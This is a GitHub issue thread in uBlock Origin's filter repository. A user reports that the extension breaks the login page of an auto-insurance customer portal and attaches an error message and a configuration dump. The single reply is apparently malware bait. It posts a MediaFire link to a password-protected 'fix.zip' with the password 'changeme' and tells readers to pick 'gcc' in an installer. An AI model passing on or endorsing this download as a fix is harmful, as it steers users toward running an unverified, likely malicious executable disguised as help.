### ISSUE TITLE
eservice.directauto.com: breakage

### ISSUE THREAD

**Issue by vincentduarte** [uBlockOrigin/uAssets#25049]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [X] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://eservice.directauto.com/service/?intcid=%2fdirectauto%2fhome%7cNavigationHeaderV2%7cLogin2`

### Category

breakage

### Description

When uBO is enabled for the site, there is a small error banner that appears at the bottom of the page. States the below. It breaks the site and doesn't even allow me to log in to the site. 

An error has occurred. This application may no longer respond until reloaded. [Reload](https://eservice.directauto.com/service/)
🗙

### Other extensions used

- 1Password
- Zoom Extension
- ColorZilla
- LanguageTool
- Decentraleyes

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

![CleanShot 2024-08-25 at 21 30 55@2x](https://github.com/user-attachments/assets/b9171e72-d70c-4be7-b5e8-beff16c6870f)

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Firefox: 129
filterset (summary):
 network: 154007
 cosmetic: 47871
 scriptlet: 20663
 html: 1933
listset (total-discarded, last-updated):
 default:
  user-filters: 0-0, never
  ublock-filters: 39777-126, now
  ublock-badware: 10693-6, now
  ublock-privacy: 1065-4, now
  ublock-unbreak: 2556-1, now
  ublock-quick-fixes: 202-6, now
  easylist: 85538-182, now
  easyprivacy: 53043-64, now
  urlhaus-1: 29590-0, now
  plowe-0: 3545-993, now
filterset (user): [empty]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 195 ms (selfie)
 maxAssetCacheWait: 45 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 8
 network:
  directauto.com: 5
  azure.com: 2
  googletagmanager.com: 1
```
</details>

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
